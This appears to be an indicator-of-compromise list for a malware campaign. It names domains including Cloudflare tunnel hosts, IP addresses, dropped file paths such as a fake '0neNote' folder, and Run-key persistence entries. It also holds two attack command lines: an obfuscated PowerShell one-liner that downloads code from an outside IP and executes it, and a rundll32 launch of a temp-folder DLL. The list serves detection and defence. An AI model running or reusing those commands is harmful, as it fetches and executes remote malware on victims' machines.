andrixdesign.com
cubawebcars.com
geo.netsupportsoftware.com
b-cdn.net
selbe.ar
bidder-horizontal-wildlife-invoice.trycloudflare.com
bristol-weed-martin-know.trycloudflare.com
musicians-forestry-operation-angels.trycloudflare.com
name-kw-papua-booking.trycloudflare.com
peter-secrets-diana-yukon.trycloudflare.com
zoloft-indianapolis-riders-convinced.trycloudflare.com
23.227.203.162
23.254.144.106
65.38.120.47
65.109.226.176
94.247.42.153
104.26.1.231
108.170.60.188
141.193.213.10
141.193.213.11
188.245.205.83
"C:\WINDOWS\system32\WindowsPowerShell\v1.0\PowerShell.exe" w h -c "$u=int64((datetime::UtcNowdatetime'1970-1-1').TotalSeconds)-band 0xfffffffffffffff0;irm 138.199.161.141:8080/$u|iex"
"cmd.exe" /C C:\Windows\System32\rundll32.exe "C:\Users*\AppData\Local\Temp/gehoas.log" rundll
C:\Users*\AppData\Local\Temp\downloaded.zip
C:\Users*\AppData\Roaming\lru05n8x\ql8enoli.dll
C:\Users*\AppData\Local\Temp\gehoas.log
C:\Users*\AppData\Roaming\dovtotx7\kuo699ql.exe
C:\Users*\AppData\Local\0neNote\client32.exe
C:\Users*\AppData\Roaming\ntmNrnMq.zip
C:\Users*\AppData\Roaming\DzIcXtPK\check.exe
C:\Users*\AppData\Roaming\j3y1a0o2\p1amkifk.exe
C:\Users*\AppData\Roaming\0qg3vr6y\s2ihyu2p.exe
C:\Users*\AppData\Local\Temp\sitsest.exe
C:\Users*\AppData\Local\0neNote\remcmdstub.exe
C:\Users*\AppData\Roaming\437y6s0l\u7qbvdm3.exe
C:\Users*\AppData\Roaming\auditpool.exe
C:\Users*\AppData\Local\Temp\sitsest.exe
USER*\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ChromeUpdater
USER*\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\0neDrive
USER*\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\0neNote
C:\Users*\AppData\Local\Temp/gehoas.lo
